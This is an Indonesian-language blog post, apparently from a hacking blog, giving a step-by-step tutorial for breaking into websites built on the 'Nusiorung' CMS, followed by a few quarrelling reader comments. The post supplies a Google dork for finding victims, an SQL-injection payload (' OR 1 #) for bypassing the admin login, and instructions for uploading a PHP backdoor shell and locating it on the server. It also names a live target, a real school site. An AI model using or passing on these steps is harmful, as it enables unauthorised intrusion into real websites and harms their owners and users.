Monday, 27 February 2017

Powered By Nusiorung - Bypassing Admin Login


Google Dork:  intext:"Powered By Nusiorung"

Login Dengan Username & Password
Username : ' OR 1 #
Password : ' OR 1 #




Jika sudah login, langsung menuju "Document" untuk mengupload shell backdoor.



Setelah itu, klik kotak pada bagian bawah


Langsung upload shell kita disini



Jika Sudah, kalian akan melihat shell kalian seperti ini, di dalam list document tadi

( Yang dilingkari merah adalah nama file shell backdoor anda )


Selanjutnya, letak shell kalian ada di:
-> /admin/document/upload/shell.php

Contoh: http://target.com/admin/document/upload/YJE6ZH.php

Live Target: 
http://edu.nmc.ac.th/th/admin/


Oke, Sekian Dulu Tutorial nya, Silakan kalian kembangi lagi.

8 comments:

  1. boleh saya ketemu sama admin website ini??

    ReplyDelete
  2. NOT WORK GOBLOOOG jangan DI SHARE < posting kayak gak niat , pakek gak nyertakan hasil uplad shell nya , berhasil atau tidak nya , payah lu gak bermutu , sengaja biar banyak pengunjung site lu ya ! goblooog .cari gw DENY WIRANDA , hacker paling hebat dan terakui !

    ReplyDelete
    Replies
    1. hahaahahaha ada orang ngaku hackel

      Delete
    2. hello guys,,,, jadi orang jangan tolol boleh endk?

      itu udh sesuai dengan judul tinggal kembangin saja -_-

      buka seperti poasting ajah targetnya masih banyak yang lain yg admin panelnya bisa di bypass -_- please be smart netizen don't be stupid netizen :p

      Delete
    3. Masa Mas Deny Asli Sih ._. Gayakin Saya Wkwkw

      Delete
    4. haters biasa, diemin aja wkwkkwwk

      Delete
  3. berhasil upload tapi malah not found di server nya ._.

    ReplyDelete